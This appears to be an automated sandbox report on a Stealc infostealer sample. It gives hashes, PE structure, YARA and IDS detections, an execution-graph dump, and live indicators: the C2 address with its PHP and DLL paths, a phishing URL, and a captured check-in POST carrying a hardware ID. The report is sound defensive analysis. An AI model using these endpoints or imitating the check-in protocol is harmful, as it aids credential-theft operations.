                                  Sample name:file.exe
                                  Detection:MAL
                                  Classification:mal100.troj.evad.winEXE@1/0@0/1
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:
                                  • Successful, ratio: 80%
                                  • Number of executed functions: 19
                                  • Number of non-executed functions: 121
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Stop behavior analysis, all processes terminated
                                  • Exclude process from analysis (whitelisted): dllhost.exe
                                  • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.215.113.206:
file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 185.215.113.206/68b591d6548ec281/sqlite3.dll
file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
E89hSGjVrv.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
Match | Associated Sample Name / URL | Detection | Threat Name | Context
s-part-0017.t-0009.t-msedge.net:
file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 13.107.246.45
file.exe | malicious | LummaC | 13.107.246.45
file.exe | malicious | Stealc | 13.107.246.45
file.exe | malicious | LummaC | 13.107.246.45
file.exe | malicious | Stealc | 13.107.246.45
E89hSGjVrv.exe | malicious | Amadey, Stealc, Vidar | 13.107.246.45
https://docusign685420961463outlook99742742685.glitch.me/#cGFsdmEwMUBtc24uY29t | malicious | HTMLPhisher | 13.107.246.45
17321442093b7efcab383e800ce7d48a843c02e132542886b8b8918e7e8cfcc51ec7dd418b419.dat-decoded.exe | malicious | Unknown | 13.107.246.45
file.exe | malicious | LummaC | 13.107.246.45
file.exe | malicious | LummaC | 13.107.246.45
Match | Associated Sample Name / URL | Detection | Threat Name | Context
WHOLESALECONNECTIONSNL:
file.exe | malicious | Stealc | 185.215.113.206
file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 185.215.113.206
file.exe | malicious | Stealc | 185.215.113.206
file.exe | malicious | Stealc | 185.215.113.206
file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 185.215.113.206
file.exe | malicious | LummaC | 185.215.113.16
file.exe | malicious | Stealc | 185.215.113.206
file.exe | malicious | LummaC | 185.215.113.16
file.exe | malicious | Stealc | 185.215.113.206
file.exe | malicious | Amadey | 185.215.113.43
No context
                                  No created / dropped files found
                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Entropy (8bit):7.946866146790984
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:file.exe
                                  File size:1'821'184 bytes
                                  MD5:3b43c7942554833f316cf7108b571f8b
                                  SHA1:f6f15b0a739eac16980144cbc1b7e2579fe9141a
                                  SHA256:a782058a0f3fe32eddc56aa22a302f5c1d7f718e434cf2c547336ace69a680e2
                                  SHA512:f12e5b6a73c6c75a1641b31446aac4111d1326b6186f9b3a70b4527256f6f4a9325382daedd89524afc2f4137536a8e6350849a18a9da769ddb834e85c7b0226
                                  SSDEEP:49152:CCRt5JhpnWwiPQ1+xLwj6oNWuJ/syBrFXVz:dRvJh1tiPs+xEJF5Brb
                                  TLSH:D2853320AB336A78CBBD2A35658E3493377817912C86E4B57F0C9FFB6C83C6501558AD
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..
                                  Icon Hash:00928e8e8686b000
                                  Entrypoint:0xaa2000
                                  Entrypoint Section:.taggant
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:5
                                  OS Version Minor:1
                                  File Version Major:5
                                  File Version Minor:1
                                  Subsystem Version Major:5
                                  Subsystem Version Minor:1
                                  Import Hash:2eabe9054cad5152567f0699947a2c5b
                                  Programming Language:
                                  • [C++] VS2010 build 30319
                                  • [ASM] VS2010 build 30319
                                  • [ C ] VS2010 build 30319
                                  • [ C ] VS2008 SP1 build 30729
                                  • [IMP] VS2008 SP1 build 30729
                                  • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x24b04d | 0x61 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x24a000 | 0x1ac | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x24b1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x249000 | 0x16200 | 43ddbdbe830b3365fc5cc31398bfd18b | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x24a000 | 0x1ac | 0x200 | 7af6a1921167553d54e95ce147c038ca | False | 0.578125 | data | 4.552153357454123 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x24b000 | 0x1000 | 0x200 | 0d0399d83a742d5d86c5718841e8e842 | False | 0.134765625 | data | 0.8646718654202081 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x24c000 | 0x2b2000 | 0x200 | bbd63fa5b49c742d63f6d5be50f52674 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
rkukuayu | 0x4fe000 | 0x1a3000 | 0x1a2c00 | 4ea1fed79c9e4f384b5343d4a1f0e182 | False | 0.9949271222014925 | data | 7.955051436363669 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
uvxbkdjf | 0x6a1000 | 0x1000 | 0x400 | fb9360c0b9df1f677f9f31b185a09dec | False | 0.75 | data | 5.978888106086439 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x6a2000 | 0x3000 | 0x2200 | 666fd6fa0fab38c1638828fc7bf0da37 | False | 0.06192555147058824 | DOS executable (COM) | 0.7469734626345014 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | ZLIB Complexity
RT_MANIFEST | 0x6a08d4 | 0x152 | ASCII text, with CRLF line terminators | 0.6479289940828402
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-21T06:23:15.183425+0100 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.5 | 49704 | 185.215.113.206 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 21, 2024 06:23:12.974828005 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
Nov 21, 2024 06:23:13.094888926 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.5
Nov 21, 2024 06:23:13.095067978 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
Nov 21, 2024 06:23:13.095531940 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
Nov 21, 2024 06:23:13.215898991 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.5
Nov 21, 2024 06:23:14.529508114 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.5
Nov 21, 2024 06:23:14.529580116 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
Nov 21, 2024 06:23:14.715358019 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
Nov 21, 2024 06:23:14.834949017 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.5
Nov 21, 2024 06:23:15.183262110 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.5
Nov 21, 2024 06:23:15.183424950 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
Nov 21, 2024 06:23:17.990291119 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName / Address | Type | Class | DNS over HTTPS
Nov 21, 2024 06:23:22.383482933 CET | 1.1.1.1 | 192.168.2.5 | 0x1d44 | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | s-part-0017.t-0009.t-msedge.net | CNAME (Canonical name) | IN (0x0001) | false
Nov 21, 2024 06:23:22.383482933 CET | 1.1.1.1 | 192.168.2.5 | 0x1d44 | No error (0) | s-part-0017.t-0009.t-msedge.net | 13.107.246.45 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 185.215.113.206 | 80 | 3668 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
Nov 21, 2024 06:23:13.095531940 CET | 90 | OUT | GET / HTTP/1.1
                                  Host: 185.215.113.206
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Nov 21, 2024 06:23:14.529508114 CET | 203 | IN | HTTP/1.1 200 OK
                                  Date: Thu, 21 Nov 2024 05:23:14 GMT
                                  Server: Apache/2.4.41 (Ubuntu)
                                  Content-Length: 0
                                  Keep-Alive: timeout=5, max=100
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Nov 21, 2024 06:23:14.715358019 CET | 412 | OUT | POST /c4becf79229cb002.php HTTP/1.1
                                  Content-Type: multipart/form-data; boundary=----AAKJKJDGCGDBGDHIJKJE
                                  Host: 185.215.113.206
                                  Content-Length: 210
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Data Raw: 2d 2d 2d 2d 2d 2d 41 41 4b 4a 4b 4a 44 47 43 47 44 42 47 44 48 49 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 34 37 32 39 38 32 30 37 34 30 46 38 30 37 36 35 36 36 31 35 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4a 4b 4a 44 47 43 47 44 42 47 44 48 49 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4a 4b 4a 44 47 43 47 44 42 47 44 48 49 4a 4b 4a 45 2d 2d 0d 0a
                                  Data Ascii: ------AAKJKJDGCGDBGDHIJKJEContent-Disposition: form-data; name="hwid"24729820740F807656615------AAKJKJDGCGDBGDHIJKJEContent-Disposition: form-data; name="build"mars------AAKJKJDGCGDBGDHIJKJE--
                                  Nov 21, 2024 06:23:15.183262110 CET | 210 | IN | HTTP/1.1 200 OK
                                  Date: Thu, 21 Nov 2024 05:23:14 GMT
                                  Server: Apache/2.4.41 (Ubuntu)
                                  Content-Length: 8
                                  Keep-Alive: timeout=5, max=99
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Data Raw: 59 6d 78 76 59 32 73 3d
                                  Data Ascii: YmxvY2s=


                                  Target ID:0
                                  Start time:00:23:08
                                  Start date:21/11/2024
                                  Path:C:\Users\user\Desktop\file.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\file.exe"
                                  Imagebase:0xa0000
                                  File size:1'821'184 bytes
                                  MD5 hash:3B43C7942554833F316CF7108B571F8B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2179287907.0000000000E4E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2127364096.0000000004A60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:low
                                  Has exited:true


                                    Execution Graph

                                    Execution Coverage:5%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:16.5%
                                    Total number of Nodes:1411
                                    Total number of Limit Nodes:28
                                    execution_graph: the rendered node/edge graph is not reproduced here. Its node labels (function address plus the Windows APIs called at that node) are summarised below.
                                    • Entry path c1bf0: a2a90 and a2e70 (long chains of a4a60 calls: RtlAllocateHeap, VirtualProtect), c6390 GetPEB, c65c3 LoadLibraryA x5 followed by a chain of GetProcAddress calls (c63d7: 20 API calls), then lstrcpy, GetSystemInfo, ExitProcess
                                    • a1030 / a100e: GetCurrentProcess, VirtualAllocExNuma, VirtualAlloc, VirtualFree, GlobalMemoryStatusEx, GetUserDefaultLangID, ExitProcess
                                    • c2ad0: GetProcessHeap, RtlAllocateHeap, GetComputerNameA; c2a40: GetProcessHeap, RtlAllocateHeap, GetUserNameA
                                    • c1e56 / c1e68 / c1e8c: OpenEventA, CloseHandle, Sleep, CreateEventA; c1b20: GetSystemTime; c1b81: sscanf; a2a24: SystemTimeToFileTime x2
                                    • c2740: GetWindowsDirectoryA; b8ca0: StrCmpCA; b7ee0 / b8050: lstrlen, lstrcpy, StrCmpCA; b7280: 1500 API calls; c1660: 12 API calls
                                    • c4480: OpenProcess, GetModuleFileNameExA, CloseHandle, lstrcpy
                                    • c3130: GetProcessHeap, RtlAllocateHeap, RegOpenKeyExA, RegQueryValueExA, RegCloseKey
                                    • c2c10: GetTimeZoneInformation; c2b60: GetLocalTime; c33c0: GlobalMemoryStatusEx; c30a0: GetSystemPowerStatus; c29a0: GetCurrentProcess, IsWow64Process; c2cd0: GetUserDefaultLocaleName, LocalAlloc, CharToOemW
                                    • c3cc0, c2853, c735d, a8e20, a8c79, a7702: string and heap handling (wsprintfA, lstrcpy, strlen, malloc, strcpy_s, free)
                                    • Remaining nodes carry only aggregated counts (e.g. adb99: 674 API calls, b1269: 408 API calls, b4b29: 303 API calls, b2499: 290 API calls, b23a9: 298 API calls)
26711 a4a60 2 API calls 26710->26711 26712 a4699 26711->26712 26713 a4a60 2 API calls 26712->26713 26714 a46af 26713->26714 26715 a4a60 2 API calls 26714->26715 26716 a46c5 26715->26716 26717 a4a60 2 API calls 26716->26717 26718 a46de 26717->26718 26719 a4a60 2 API calls 26718->26719 26720 a46f4 26719->26720 26721 a4a60 2 API calls 26720->26721 26722 a470a 26721->26722 26723 a4a60 2 API calls 26722->26723 26724 a4720 26723->26724 26725 a4a60 2 API calls 26724->26725 26726 a4736 26725->26726 26727 a4a60 2 API calls 26726->26727 26728 a474c 26727->26728 26729 a4a60 2 API calls 26728->26729 26730 a4765 26729->26730 26731 a4a60 2 API calls 26730->26731 26732 a477b 26731->26732 26733 a4a60 2 API calls 26732->26733 26734 a4791 26733->26734 26735 a4a60 2 API calls 26734->26735 26736 a47a7 26735->26736 26737 a4a60 2 API calls 26736->26737 26738 a47bd 26737->26738 26739 a4a60 2 API calls 26738->26739 26740 a47d3 26739->26740 26741 a4a60 2 API calls 26740->26741 26742 a47ec 26741->26742 26743 a4a60 2 API calls 26742->26743 26744 a4802 26743->26744 26745 a4a60 2 API calls 26744->26745 26746 a4818 26745->26746 26747 a4a60 2 API calls 26746->26747 26748 a482e 26747->26748 26749 a4a60 2 API calls 26748->26749 26750 a4844 26749->26750 26751 a4a60 2 API calls 26750->26751 26752 a485a 26751->26752 26753 a4a60 2 API calls 26752->26753 26754 a4873 26753->26754 26755 a4a60 2 API calls 26754->26755 26756 a4889 26755->26756 26757 a4a60 2 API calls 26756->26757 26758 a489f 26757->26758 26759 a4a60 2 API calls 26758->26759 26760 a48b5 26759->26760 26761 a4a60 2 API calls 26760->26761 26762 a48cb 26761->26762 26763 a4a60 2 API calls 26762->26763 26764 a48e1 26763->26764 26765 a4a60 2 API calls 26764->26765 26766 a48fa 26765->26766 26767 a4a60 2 API calls 26766->26767 26768 a4910 26767->26768 26769 a4a60 2 API calls 26768->26769 26770 a4926 26769->26770 26771 a4a60 2 API calls 26770->26771 26772 a493c 26771->26772 26773 a4a60 2 API calls 26772->26773 26774 a4952 26773->26774 26775 a4a60 2 
API calls 26774->26775 26776 a4968 26775->26776 26777 a4a60 2 API calls 26776->26777 26778 a4981 26777->26778 26779 a4a60 2 API calls 26778->26779 26780 a4997 26779->26780 26781 a4a60 2 API calls 26780->26781 26782 a49ad 26781->26782 26783 a4a60 2 API calls 26782->26783 26784 a49c3 26783->26784 26785 a4a60 2 API calls 26784->26785 26786 a49d9 26785->26786 26787 a4a60 2 API calls 26786->26787 26788 a49ef 26787->26788 26789 a4a60 2 API calls 26788->26789 26790 a4a08 26789->26790 26791 a4a60 2 API calls 26790->26791 26792 a4a1e 26791->26792 26793 a4a60 2 API calls 26792->26793 26794 a4a34 26793->26794 26795 a4a60 2 API calls 26794->26795 26796 a4a4a 26795->26796 26797 c66e0 26796->26797 26798 c66ed 43 API calls 26797->26798 26799 c6afe 8 API calls 26797->26799 26798->26799 26800 c6c08 26799->26800 26801 c6b94 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26799->26801 26802 c6c15 8 API calls 26800->26802 26803 c6cd2 26800->26803 26801->26800 26802->26803 26804 c6d4f 26803->26804 26805 c6cdb GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26803->26805 26806 c6d5c 6 API calls 26804->26806 26807 c6de9 26804->26807 26805->26804 26806->26807 26808 c6df6 12 API calls 26807->26808 26809 c6f10 26807->26809 26808->26809 26810 c6f8d 26809->26810 26811 c6f19 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26809->26811 26812 c6f96 GetProcAddress GetProcAddress 26810->26812 26813 c6fc1 26810->26813 26811->26810 26812->26813 26814 c6fca GetProcAddress GetProcAddress 26813->26814 26815 c6ff5 26813->26815 26814->26815 26816 c70ed 26815->26816 26817 c7002 10 API calls 26815->26817 26818 c70f6 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26816->26818 26819 c7152 26816->26819 26817->26816 26818->26819 26820 c716e 26819->26820 26821 c715b GetProcAddress 26819->26821 26822 c7177 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26820->26822 26823 c051f 26820->26823 26821->26820 
26822->26823 26824 a1530 26823->26824 27133 a1610 26824->27133 26826 a153b 26827 a1555 lstrcpy 26826->26827 26828 a155d 26826->26828 26827->26828 26829 a1577 lstrcpy 26828->26829 26830 a157f 26828->26830 26829->26830 26831 a1599 lstrcpy 26830->26831 26832 a15a1 26830->26832 26831->26832 26833 a1605 26832->26833 26834 a15fd lstrcpy 26832->26834 26835 bf1b0 lstrlen 26833->26835 26834->26833 26836 bf1e4 26835->26836 26837 bf1eb lstrcpy 26836->26837 26838 bf1f7 lstrlen 26836->26838 26837->26838 26839 bf208 26838->26839 26840 bf21b lstrlen 26839->26840 26841 bf20f lstrcpy 26839->26841 26842 bf22c 26840->26842 26841->26840 26843 bf233 lstrcpy 26842->26843 26844 bf23f 26842->26844 26843->26844 26845 bf258 lstrcpy 26844->26845 26846 bf264 26844->26846 26845->26846 26847 bf286 lstrcpy 26846->26847 26848 bf292 26846->26848 26847->26848 26849 bf2ba lstrcpy 26848->26849 26850 bf2c6 26848->26850 26849->26850 26851 bf2ea lstrcpy 26850->26851 26912 bf300 26850->26912 26851->26912 26852 bf30c lstrlen 26852->26912 26853 bf4b9 lstrcpy 26853->26912 26854 bf3a1 lstrcpy 26854->26912 26855 bf3c5 lstrcpy 26855->26912 26856 bf4e8 lstrcpy 26917 bf4f0 26856->26917 26857 a1530 8 API calls 26857->26917 26858 befb0 35 API calls 26858->26917 26859 bf479 lstrcpy 26859->26912 26860 bf59c lstrcpy 26860->26917 26861 bf616 StrCmpCA 26862 bf70f StrCmpCA 26861->26862 26861->26917 26866 bfe8e 26862->26866 26862->26912 26863 bfa29 StrCmpCA 26873 bfe2b 26863->26873 26863->26912 26864 bf73e lstrlen 26864->26912 26865 bfead lstrlen 26879 bfec7 26865->26879 26866->26865 26871 bfea5 lstrcpy 26866->26871 26867 bfd4d StrCmpCA 26869 bfd60 Sleep 26867->26869 26876 bfd75 26867->26876 26868 bf64a lstrcpy 26868->26917 26869->26912 26870 bfa58 lstrlen 26870->26912 26871->26865 26872 bfe4a lstrlen 26886 bfe64 26872->26886 26873->26872 26874 bfe42 lstrcpy 26873->26874 26874->26872 26875 bf89e lstrcpy 26875->26912 26877 bfd94 lstrlen 26876->26877 26881 bfd8c lstrcpy 26876->26881 26888 bfdae 26877->26888 26878 bf76f 
lstrcpy 26878->26912 26880 bfee7 lstrlen 26879->26880 26883 bfedf lstrcpy 26879->26883 26884 bff01 26880->26884 26881->26877 26882 bfbb8 lstrcpy 26882->26912 26883->26880 26893 bff21 26884->26893 26894 bff19 lstrcpy 26884->26894 26885 bfa89 lstrcpy 26885->26912 26887 bfdce lstrlen 26886->26887 26889 bfe7c lstrcpy 26886->26889 26901 bfde8 26887->26901 26888->26887 26898 bfdc6 lstrcpy 26888->26898 26889->26887 26890 bf791 lstrcpy 26890->26912 26892 bf8cd lstrcpy 26892->26917 26895 a1610 4 API calls 26893->26895 26894->26893 26919 bfe13 26895->26919 26896 bfaab lstrcpy 26896->26912 26897 bf698 lstrcpy 26897->26917 26898->26887 26899 a1530 8 API calls 26899->26912 26900 bfbe7 lstrcpy 26900->26917 26903 bfe08 26901->26903 26904 bfe00 lstrcpy 26901->26904 26902 bee90 28 API calls 26902->26912 26905 a1610 4 API calls 26903->26905 26904->26903 26905->26919 26906 bf7e2 lstrcpy 26906->26912 26907 bf924 lstrcpy 26907->26917 26908 bf99e StrCmpCA 26908->26863 26908->26917 26909 bfafc lstrcpy 26909->26912 26910 bfc3e lstrcpy 26910->26917 26911 bfcb8 StrCmpCA 26911->26867 26911->26917 26912->26852 26912->26853 26912->26854 26912->26855 26912->26856 26912->26859 26912->26862 26912->26863 26912->26864 26912->26867 26912->26870 26912->26875 26912->26878 26912->26882 26912->26885 26912->26890 26912->26892 26912->26896 26912->26899 26912->26900 26912->26902 26912->26906 26912->26909 26912->26917 26913 bf9cb lstrcpy 26913->26917 26914 bfce9 lstrcpy 26914->26917 26915 bee90 28 API calls 26915->26917 26916 bfa19 lstrcpy 26916->26917 26917->26857 26917->26858 26917->26860 26917->26861 26917->26863 26917->26867 26917->26868 26917->26897 26917->26907 26917->26908 26917->26910 26917->26911 26917->26912 26917->26913 26917->26914 26917->26915 26917->26916 26918 bfd3a lstrcpy 26917->26918 26918->26917 26919->25943 26921 c278c GetVolumeInformationA 26920->26921 26922 c2785 26920->26922 26923 c27ec GetProcessHeap RtlAllocateHeap 26921->26923 26922->26921 26925 c2826 wsprintfA 26923->26925 26926 
c2822 26923->26926 26925->26926 27143 c71e0 26926->27143 26930 a4c70 26929->26930 26931 a4c85 26930->26931 26932 a4c7d lstrcpy 26930->26932 27147 a4bc0 26931->27147 26932->26931 26934 a4c90 26935 a4ccc lstrcpy 26934->26935 26936 a4cd8 26934->26936 26935->26936 26937 a4cff lstrcpy 26936->26937 26938 a4d0b 26936->26938 26937->26938 26939 a4d2f lstrcpy 26938->26939 26940 a4d3b 26938->26940 26939->26940 26941 a4d6d lstrcpy 26940->26941 26942 a4d79 26940->26942 26941->26942 26943 a4dac InternetOpenA StrCmpCA 26942->26943 26944 a4da0 lstrcpy 26942->26944 26945 a4de0 26943->26945 26944->26943 26946 a54b8 InternetCloseHandle CryptStringToBinaryA 26945->26946 27151 c3e70 26945->27151 26947 a54e8 LocalAlloc 26946->26947 26957 a55d8 26946->26957 26949 a54ff CryptStringToBinaryA 26947->26949 26947->26957 26950 a5529 lstrlen 26949->26950 26951 a5517 LocalFree 26949->26951 26952 a553d 26950->26952 26951->26957 26954 a5563 lstrlen 26952->26954 26955 a5557 lstrcpy 26952->26955 26953 a4dfa 26956 a4e23 lstrcpy lstrcat 26953->26956 26958 a4e38 26953->26958 26960 a557d 26954->26960 26955->26954 26956->26958 26957->25972 26959 a4e5a lstrcpy 26958->26959 26961 a4e62 26958->26961 26959->26961 26962 a558f lstrcpy lstrcat 26960->26962 26963 a55a2 26960->26963 26964 a4e71 lstrlen 26961->26964 26962->26963 26965 a55d1 26963->26965 26967 a55c9 lstrcpy 26963->26967 26966 a4e89 26964->26966 26965->26957 26968 a4e95 lstrcpy lstrcat 26966->26968 26969 a4eac 26966->26969 26967->26965 26968->26969 26970 a4ed5 26969->26970 26971 a4ecd lstrcpy 26969->26971 26972 a4edc lstrlen 26970->26972 26971->26970 26973 a4ef2 26972->26973 26974 a4efe lstrcpy lstrcat 26973->26974 26975 a4f15 26973->26975 26974->26975 26976 a4f36 lstrcpy 26975->26976 26977 a4f3e 26975->26977 26976->26977 26978 a4f65 lstrcpy lstrcat 26977->26978 26979 a4f7b 26977->26979 26978->26979 26980 a4fa4 26979->26980 26981 a4f9c lstrcpy 26979->26981 26982 a4fab lstrlen 26980->26982 26981->26980 26983 a4fc1 26982->26983 26984 a4fcd lstrcpy 
lstrcat 26983->26984 26985 a4fe4 26983->26985 26984->26985 26986 a500d 26985->26986 26987 a5005 lstrcpy 26985->26987 26988 a5014 lstrlen 26986->26988 26987->26986 26989 a502a 26988->26989 26990 a5036 lstrcpy lstrcat 26989->26990 26991 a504d 26989->26991 26990->26991 26992 a5079 26991->26992 26993 a5071 lstrcpy 26991->26993 26994 a5080 lstrlen 26992->26994 26993->26992 26995 a509b 26994->26995 26996 a50ac lstrcpy lstrcat 26995->26996 26997 a50bc 26995->26997 26996->26997 26998 a50da lstrcpy lstrcat 26997->26998 26999 a50ed 26997->26999 26998->26999 27000 a510b lstrcpy 26999->27000 27001 a5113 26999->27001 27000->27001 27002 a5121 InternetConnectA 27001->27002 27002->26946 27003 a5150 HttpOpenRequestA 27002->27003 27004 a518b 27003->27004 27005 a54b1 InternetCloseHandle 27003->27005 27158 c7310 lstrlen 27004->27158 27005->26946 27009 a51a4 27166 c72c0 27009->27166 27012 c7280 lstrcpy 27013 a51c0 27012->27013 27014 c7310 3 API calls 27013->27014 27015 a51d5 27014->27015 27016 c7280 lstrcpy 27015->27016 27017 a51de 27016->27017 27018 c7310 3 API calls 27017->27018 27019 a51f4 27018->27019 27020 c7280 lstrcpy 27019->27020 27021 a51fd 27020->27021 27022 c7310 3 API calls 27021->27022 27023 a5213 27022->27023 27024 c7280 lstrcpy 27023->27024 27025 a521c 27024->27025 27026 c7310 3 API calls 27025->27026 27027 a5231 27026->27027 27028 c7280 lstrcpy 27027->27028 27029 a523a 27028->27029 27030 c72c0 2 API calls 27029->27030 27031 a524d 27030->27031 27032 c7280 lstrcpy 27031->27032 27033 a5256 27032->27033 27034 c7310 3 API calls 27033->27034 27035 a526b 